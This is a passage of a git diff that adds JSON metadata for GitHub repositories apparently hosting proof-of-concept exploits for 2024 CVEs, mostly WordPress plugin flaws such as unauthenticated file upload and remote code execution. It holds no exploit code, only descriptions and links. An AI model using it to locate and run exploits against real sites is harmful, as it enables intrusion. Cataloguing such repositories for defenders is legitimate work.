+ "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50490.json b/2024/CVE-2024-50490.json new file mode 100644 index 0000000000..f74719f557 --- /dev/null +++ b/2024/CVE-2024-50490.json @@ -0,0 +1,33 @@ +[ + { + "id": 883699871, + "name": "CVE-2024-50490", + "full_name": "RandomRobbieBF\/CVE-2024-50490", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50490", + "description": "PegaPoll <= 1.0.2 - Unauthenticated Arbitrary Options Update", + "fork": false, + "created_at": "2024-11-05T12:27:41Z", + "updated_at": "2024-11-05T12:29:25Z", + "pushed_at": "2024-11-05T12:29:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50493.json b/2024/CVE-2024-50493.json new file mode 100644 index 0000000000..8777841d4f --- /dev/null +++ b/2024/CVE-2024-50493.json @@ -0,0 +1,33 @@ +[ + { + "id": 886111060, + "name": "CVE-2024-50493", + "full_name": "RandomRobbieBF\/CVE-2024-50493", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50493", + "description": "Automatic Translation <= 1.0.4 - Unauthenticated Arbitrary File Upload", + "fork": false, + "created_at": "2024-11-10T08:17:41Z", + "updated_at": "2024-11-10T08:18:31Z", + "pushed_at": "2024-11-10T08:18:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50498.json b/2024/CVE-2024-50498.json new file mode 100644 index 0000000000..7354dc24ea --- /dev/null +++ b/2024/CVE-2024-50498.json @@ -0,0 +1,95 @@ +[ + { + "id": 883392821, + "name": "CVE-2024-50498", + "full_name": "RandomRobbieBF\/CVE-2024-50498", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50498", + "description": "WP Query Console <= 1.0 - Unauthenticated Remote Code Execution", + "fork": false, + "created_at": "2024-11-04T22:13:45Z", + "updated_at": "2024-11-18T22:09:19Z", + "pushed_at": "2024-11-04T22:15:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 898207911, + "name": "CVE-2024-50498", + "full_name": "p0et08\/CVE-2024-50498", + "owner": { + "login": "p0et08", + "id": 173439951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173439951?v=4", + "html_url": "https:\/\/github.com\/p0et08", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p0et08\/CVE-2024-50498", + "description": "This is a exploit for CVE-2024-50498", + "fork": false, + "created_at": "2024-12-04T01:30:19Z", + "updated_at": "2024-12-05T04:31:51Z", + "pushed_at": "2024-12-04T02:12:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 911806172, + "name": "CVE-2024-50498", + "full_name": "Nxploited\/CVE-2024-50498", + "owner": { + "login": "Nxploited", + "id": 188819918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188819918?v=4", + "html_url": "https:\/\/github.com\/Nxploited", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nxploited\/CVE-2024-50498", + "description": null, + "fork": false, + "created_at": "2025-01-03T22:36:43Z", + "updated_at": "2025-01-03T22:53:12Z", + "pushed_at": "2025-01-03T22:53:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50507.json b/2024/CVE-2024-50507.json new file mode 100644 index 0000000000..e4c407a032 --- /dev/null +++ b/2024/CVE-2024-50507.json @@ -0,0 +1,33 @@ +[ + { + "id": 904385732, + "name": "CVE-2024-50507", + "full_name": "RandomRobbieBF\/CVE-2024-50507", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50507", + "description": "DS.DownloadList <= 1.3 - Unauthenticated PHP Object Injection", + "fork": false, + "created_at": "2024-12-16T19:36:26Z", + "updated_at": "2025-01-06T13:39:56Z", + "pushed_at": "2024-12-16T19:36:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50508.json b/2024/CVE-2024-50508.json new file mode 100644 index 0000000000..8d3ac85846 --- /dev/null +++ b/2024/CVE-2024-50508.json @@ -0,0 +1,33 @@ +[ + { + "id": 904394229, + "name": "CVE-2024-50508", + "full_name": "RandomRobbieBF\/CVE-2024-50508", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50508", + "description": "Woocommerce Product Design <= 1.0.0 - Unauthenticated Arbitrary File Download", + "fork": false, + "created_at": "2024-12-16T20:00:24Z", + "updated_at": "2025-01-06T13:20:46Z", + "pushed_at": "2024-12-16T20:00:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50509.json b/2024/CVE-2024-50509.json new file mode 100644 index 0000000000..c71aff26a2 --- /dev/null +++ b/2024/CVE-2024-50509.json @@ -0,0 +1,33 @@ +[ + { + "id": 904378470, + "name": "CVE-2024-50509", + "full_name": "RandomRobbieBF\/CVE-2024-50509", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50509", + "description": "Woocommerce Product Design <= 1.0.0 - Unauthenticated Arbitrary File Deletion", + "fork": false, + "created_at": "2024-12-16T19:17:07Z", + "updated_at": "2024-12-17T11:02:40Z", + "pushed_at": "2024-12-16T19:53:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50510.json b/2024/CVE-2024-50510.json new file mode 100644 index 0000000000..a3b07d1d10 --- /dev/null +++ b/2024/CVE-2024-50510.json @@ -0,0 +1,33 @@ +[ + { + "id": 904399683, + "name": "CVE-2024-50510", + "full_name": "RandomRobbieBF\/CVE-2024-50510", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50510", + "description": "AR For Woocommerce <= 6.2 - Unauthenticated Arbitrary File Upload", + "fork": false, + "created_at": "2024-12-16T20:15:56Z", + "updated_at": "2025-01-06T13:19:35Z", + "pushed_at": "2024-12-16T21:28:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50623.json b/2024/CVE-2024-50623.json new file mode 100644 index 0000000000..cae606484f --- /dev/null +++ b/2024/CVE-2024-50623.json @@ -0,0 +1,101 @@ +[ + { + "id": 901898206, + "name": "CVE-2024-50623", + "full_name": "watchtowrlabs\/CVE-2024-50623", + "owner": { + "login": "watchtowrlabs", + "id": 99977116, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99977116?v=4", + "html_url": "https:\/\/github.com\/watchtowrlabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/watchtowrlabs\/CVE-2024-50623", + "description": "Cleo Unrestricted file upload and download PoC (CVE-2024-50623)", + "fork": false, + "created_at": "2024-12-11T14:19:55Z", + "updated_at": "2024-12-16T20:09:24Z", + "pushed_at": "2024-12-11T14:23:19Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 19, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 907288727, + "name": "CVE-2024-50623", + "full_name": "verylazytech\/CVE-2024-50623", + "owner": { + "login": "verylazytech", + "id": 172168670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172168670?v=4", + "html_url": "https:\/\/github.com\/verylazytech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/verylazytech\/CVE-2024-50623", + "description": "CVE-2024-50623 POC - Cleo Unrestricted file upload and download", + "fork": false, + "created_at": "2024-12-23T08:52:23Z", + "updated_at": "2025-01-05T02:04:08Z", + "pushed_at": "2024-12-23T09:16:15Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cleo", + "cve-2024-50623", + "file-upload", + "lfi-exploitation", + "rce-exploit" + ], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 910411215, + "name": "Cleo-CVE-2024-50623-PoC", + "full_name": "iSee857\/Cleo-CVE-2024-50623-PoC", + "owner": { + "login": "iSee857", + "id": 73977770, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73977770?v=4", + "html_url": "https:\/\/github.com\/iSee857", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iSee857\/Cleo-CVE-2024-50623-PoC", + "description": "Cleo 远程代码执行漏洞批量检测脚本(CVE-2024-50623)", + "fork": false, + "created_at": "2024-12-31T07:43:48Z", + "updated_at": "2025-01-01T16:04:39Z", + "pushed_at": "2024-12-31T07:46:50Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50657.json b/2024/CVE-2024-50657.json new file mode 100644 index 0000000000..9d9b2c850e --- /dev/null +++ b/2024/CVE-2024-50657.json @@ -0,0 +1,33 @@ +[ + { + "id": 888839263, + "name": "CVE-2024-50657", + "full_name": "SAHALLL\/CVE-2024-50657", + "owner": { + "login": "SAHALLL", + "id": 90813381, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90813381?v=4", + "html_url": "https:\/\/github.com\/SAHALLL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SAHALLL\/CVE-2024-50657", + "description": null, + "fork": false, + "created_at": "2024-11-15T05:22:27Z", + "updated_at": "2024-11-16T04:12:32Z", + "pushed_at": "2024-11-16T04:12:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50677.json b/2024/CVE-2024-50677.json new file mode 100644 index 0000000000..2d86e42f0f --- /dev/null +++ b/2024/CVE-2024-50677.json @@ -0,0 +1,33 @@ +[ + { + "id": 899289654, + "name": "CVE-2024-50677", + "full_name": "ZumiYumi\/CVE-2024-50677", + "owner": { + "login": "ZumiYumi", + "id": 150757931, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/150757931?v=4", + "html_url": "https:\/\/github.com\/ZumiYumi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZumiYumi\/CVE-2024-50677", + "description": "This repository presents a proof-of-concept of CVE-2024-50677", + "fork": false, + "created_at": "2024-12-06T01:04:44Z", + "updated_at": "2024-12-07T22:39:19Z", + "pushed_at": "2024-12-07T22:39:16Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50803.json b/2024/CVE-2024-50803.json new file mode 100644 index 0000000000..4d2bf4f414 --- /dev/null +++ b/2024/CVE-2024-50803.json @@ -0,0 +1,33 @@ +[ + { + "id": 889129803, + "name": "CVE-2024-50803-Redaxo", + "full_name": "Praison001\/CVE-2024-50803-Redaxo", + "owner": { + "login": "Praison001", + "id": 60835238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60835238?v=4", + "html_url": "https:\/\/github.com\/Praison001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Praison001\/CVE-2024-50803-Redaxo", + "description": "Stored XSS in mediapool feature of Redaxo", + "fork": false, + "created_at": "2024-11-15T17:05:04Z", + "updated_at": "2024-11-19T17:56:09Z", + "pushed_at": "2024-11-19T17:56:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50804.json b/2024/CVE-2024-50804.json new file mode 100644 index 0000000000..e512e77779 --- /dev/null +++ b/2024/CVE-2024-50804.json @@ -0,0 +1,33 @@ +[ + { + "id": 883225767, + "name": "CVE-2024-50804", + "full_name": "g3tsyst3m\/CVE-2024-50804", + "owner": { + "login": "g3tsyst3m", + "id": 19558280, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19558280?v=4", + "html_url": "https:\/\/github.com\/g3tsyst3m", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/g3tsyst3m\/CVE-2024-50804", + "description": "MSI Center Pro 2.1.37.0 - CVE-2024-50804", + "fork": false, + "created_at": "2024-11-04T15:38:19Z", + "updated_at": "2024-11-19T01:50:51Z", + "pushed_at": "2024-11-16T18:17:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5084.json b/2024/CVE-2024-5084.json new file mode 100644 index 0000000000..70a0792fbf --- /dev/null +++ b/2024/CVE-2024-5084.json @@ -0,0 +1,197 @@ +[ + { + "id": 805639631, + "name": "CVE-2024-5084", + "full_name": "KTN1990\/CVE-2024-5084", + "owner": { + "login": "KTN1990", + "id": 33407405, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33407405?v=4", + "html_url": "https:\/\/github.com\/KTN1990", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KTN1990\/CVE-2024-5084", + "description": "WordPress Hash Form – Drag & Drop Form Builder <= 1.1.0 - Unauthenticated Arbitrary File Upload to Remote Code Execution", + "fork": false, + "created_at": "2024-05-25T03:49:04Z", + "updated_at": "2024-06-19T22:37:57Z", + "pushed_at": "2024-05-31T19:51:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit", + "exploitwordpress", + "shell", + "upload", + "vulnerability", + "wordpress", + "wordpressexploit" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 806742640, + "name": "CVE-2024-5084", + "full_name": "Chocapikk\/CVE-2024-5084", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-5084", + "description": "Hash Form – Drag & Drop Form Builder <= 1.1.0 - Unauthenticated Arbitrary File Upload to Remote Code Execution", + "fork": false, + "created_at": "2024-05-27T20:04:10Z", + "updated_at": "2024-11-23T10:49:51Z", + "pushed_at": "2024-07-17T23:40:18Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 811151698, + "name": "CVE-2024-5084", + "full_name": "k3lpi3b4nsh33\/CVE-2024-5084", + "owner": { + "login": "k3lpi3b4nsh33", + "id": 118002757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118002757?v=4", + "html_url": "https:\/\/github.com\/k3lpi3b4nsh33", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k3lpi3b4nsh33\/CVE-2024-5084", + "description": null, + "fork": false, + "created_at": "2024-06-06T03:25:44Z", + "updated_at": "2024-06-06T03:29:27Z", + "pushed_at": "2024-06-06T03:29:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823453279, + "name": "CVE-2024-5084", + "full_name": "WOOOOONG\/CVE-2024-5084", + "owner": { + "login": "WOOOOONG", + "id": 40143329, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40143329?v=4", + "html_url": "https:\/\/github.com\/WOOOOONG", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WOOOOONG\/CVE-2024-5084", + "description": "PoC Exploit for CVE-2024-5084", + "fork": false, + "created_at": "2024-07-03T04:24:43Z", + "updated_at": "2024-07-03T04:25:23Z", + "pushed_at": "2024-07-03T04:24:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 891893726, + "name": "CVE-2024-5084", + "full_name": "z1gazaga\/CVE-2024-5084", + "owner": { + "login": "z1gazaga", + "id": 121556738, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121556738?v=4", + "html_url": "https:\/\/github.com\/z1gazaga", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z1gazaga\/CVE-2024-5084", + "description": "Материалы для научной работы", + "fork": false, + "created_at": "2024-11-21T06:26:21Z", + "updated_at": "2024-11-21T07:11:38Z", + "pushed_at": "2024-11-21T07:11:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 896403799, + "name": "CVE-2024-5084", + "full_name": "Raeezrbr\/CVE-2024-5084", + "owner": { + "login": "Raeezrbr", + "id": 135034223, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/135034223?v=4", + "html_url": "https:\/\/github.com\/Raeezrbr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Raeezrbr\/CVE-2024-5084", + "description": null, + "fork": false, + "created_at": "2024-11-30T09:15:34Z", + "updated_at": "2024-11-30T10:56:01Z", + "pushed_at": "2024-11-30T10:55:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50848.json b/2024/CVE-2024-50848.json new file mode 100644 index 0000000000..f2a77d7274 --- /dev/null +++ b/2024/CVE-2024-50848.json @@ -0,0 +1,33 @@ +[ + { + "id": 889175343, + "name": "CVE-2024-50848", + "full_name": "Wh1teSnak3\/CVE-2024-50848", + "owner": { + "login": "Wh1teSnak3", + "id": 188617964, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188617964?v=4", + "html_url": "https:\/\/github.com\/Wh1teSnak3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wh1teSnak3\/CVE-2024-50848", + "description": null, + "fork": false, + "created_at": "2024-11-15T18:57:25Z", + "updated_at": "2024-11-15T19:29:50Z", + "pushed_at": "2024-11-15T19:29:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50849.json b/2024/CVE-2024-50849.json new file mode 100644 index 0000000000..795dda75d2 --- /dev/null +++ b/2024/CVE-2024-50849.json @@ -0,0 +1,33 @@ +[ + { + "id": 889195386, + "name": "CVE-2024-50849", + "full_name": "Wh1teSnak3\/CVE-2024-50849", + "owner": { + "login": "Wh1teSnak3", + "id": 188617964, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188617964?v=4", + "html_url": "https:\/\/github.com\/Wh1teSnak3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wh1teSnak3\/CVE-2024-50849", + "description": null, + "fork": false, + "created_at": "2024-11-15T19:51:18Z", + "updated_at": "2024-11-18T22:52:00Z", + "pushed_at": "2024-11-18T22:51:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50944.json b/2024/CVE-2024-50944.json new file mode 100644 index 0000000000..ac915627ff --- /dev/null +++ b/2024/CVE-2024-50944.json @@ -0,0 +1,33 @@ +[ + { + "id": 905989849, + "name": "CVE-2024-50944", + "full_name": "AbdullahAlmutawa\/CVE-2024-50944", + "owner": { + "login": "AbdullahAlmutawa", + "id": 53648024, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53648024?v=4", + "html_url": "https:\/\/github.com\/AbdullahAlmutawa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AbdullahAlmutawa\/CVE-2024-50944", + "description": "Integer Overflow in Cart Logic in SimplCommerce allows remote attackers to manipulate product quantities and total prices via crafted inputs that exploit insufficient validation of the quantity parameter.", + "fork": false, + "created_at": "2024-12-19T23:33:21Z", + "updated_at": "2025-01-02T20:58:37Z", + "pushed_at": "2025-01-02T20:58:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50945.json b/2024/CVE-2024-50945.json new file mode 100644 index 0000000000..b0430fb91d --- /dev/null +++ b/2024/CVE-2024-50945.json @@ -0,0 +1,33 @@ +[ + { + "id": 906003968, + "name": "CVE-2024-50945", + "full_name": "AbdullahAlmutawa\/CVE-2024-50945", + "owner": { + "login": "AbdullahAlmutawa", + "id": 53648024, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53648024?v=4", + "html_url": "https:\/\/github.com\/AbdullahAlmutawa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AbdullahAlmutawa\/CVE-2024-50945", + "description": "SimplCommerce is affected by a Broken Access Control vulnerability in the review system, allowing unauthorized users to post reviews for products they have not purchased.", + "fork": false, + "created_at": "2024-12-20T00:43:18Z", + "updated_at": "2025-01-02T20:59:58Z", + "pushed_at": "2025-01-02T20:59:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50961.json b/2024/CVE-2024-50961.json new file mode 100644 index 0000000000..ec23a70f41 --- /dev/null +++ b/2024/CVE-2024-50961.json @@ -0,0 +1,37 @@ +[ + { + "id": 887738523, + "name": "CVE-2024-50961", + "full_name": "fdzdev\/CVE-2024-50961", + "owner": { + "login": "fdzdev", + "id": 17630462, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17630462?v=4", + "html_url": "https:\/\/github.com\/fdzdev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fdzdev\/CVE-2024-50961", + "description": "Remote attacker can access sensitive data exposed on the URL", + "fork": false, + "created_at": "2024-11-13T07:43:06Z", + "updated_at": "2024-11-13T07:53:44Z", + "pushed_at": "2024-11-13T07:47:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-50961", + "cves" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50962.json b/2024/CVE-2024-50962.json new file mode 100644 index 0000000000..f1c7ab6cd0 --- /dev/null +++ b/2024/CVE-2024-50962.json @@ -0,0 +1,37 @@ +[ + { + "id": 887740422, + "name": "CVE-2024-50962", + "full_name": "fdzdev\/CVE-2024-50962", + "owner": { + "login": "fdzdev", + "id": 17630462, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17630462?v=4", + "html_url": "https:\/\/github.com\/fdzdev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fdzdev\/CVE-2024-50962", + "description": "A Cross-Site Scripting (XSS) vulnerability", + "fork": false, + "created_at": "2024-11-13T07:47:38Z", + "updated_at": "2024-11-13T08:28:29Z", + "pushed_at": "2024-11-13T07:48:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-50962", + "cves" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50964.json b/2024/CVE-2024-50964.json new file mode 100644 index 0000000000..bfd850d53f --- /dev/null +++ b/2024/CVE-2024-50964.json @@ -0,0 +1,37 @@ +[ + { + "id": 887741002, + "name": "CVE-2024-50964", + "full_name": "fdzdev\/CVE-2024-50964", + "owner": { + "login": "fdzdev", + "id": 17630462, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17630462?v=4", + "html_url": "https:\/\/github.com\/fdzdev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fdzdev\/CVE-2024-50964", + "description": "MX Server misconfiguration", + "fork": false, + "created_at": "2024-11-13T07:49:09Z", + "updated_at": "2024-11-13T08:28:26Z", + 